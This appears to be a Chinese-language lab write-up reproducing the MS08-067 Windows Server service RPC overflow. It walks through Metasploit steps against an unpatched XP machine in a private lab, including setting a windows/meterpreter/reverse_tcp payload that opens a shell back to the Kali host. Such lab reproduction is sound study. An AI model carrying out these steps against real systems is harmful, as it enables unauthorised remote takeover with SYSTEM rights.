ms08-067漏洞复现

ms08-067简介

Windows Server服务RPC请求缓冲区溢出漏洞（MS08-067）。

• 漏洞类别：远程溢出
• CVE-ID : 2008-4250

漏洞详情：

MicrosoftWindows是美国微软（Microsoft）公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，以SYSTEM权限执行任意指令。对于Windows2000、XP和Server2003，无需认证便可以利用这个漏洞；对于WindowsVista和Server2008，可能需要进行认证。

参考链接：
Windows Server服务 RPC请求缓冲区溢出漏洞
Windows Server服务RPC请求缓冲区溢出漏洞（MS08-067）

---

复现

实验环境

未打补丁的xp:192.168.43.199
kali：192.168.43.185
两台主机之间可以通信。

---

漏洞利用

首先进入msfconsole，寻找ms08-067相关的攻击模块。

这里只有一个可用的exploit模块，use它。

然后show targets查看一下，该模块都适用于哪些windows版本。

本次实验的主机是xp3 simplified。
这里将目标主机的类型设置。

然后看一下需要配置哪些参数show options

这里设置一下rhosts即可。

然后查看一下有哪些可用的payload;show payloads

这里选择44号。set pyaload windows/meterpreter/reverse_tcp

然后再看一下payload需要配置哪些参数show options

需要配置lohost和lport；配置监听地址和监听端口。监听端口有默认值，这里就只配置监听地址为kali的IP。

然后开始渗透

如图所示渗透成功。

未解决：
进入cmd后，存在乱码问题。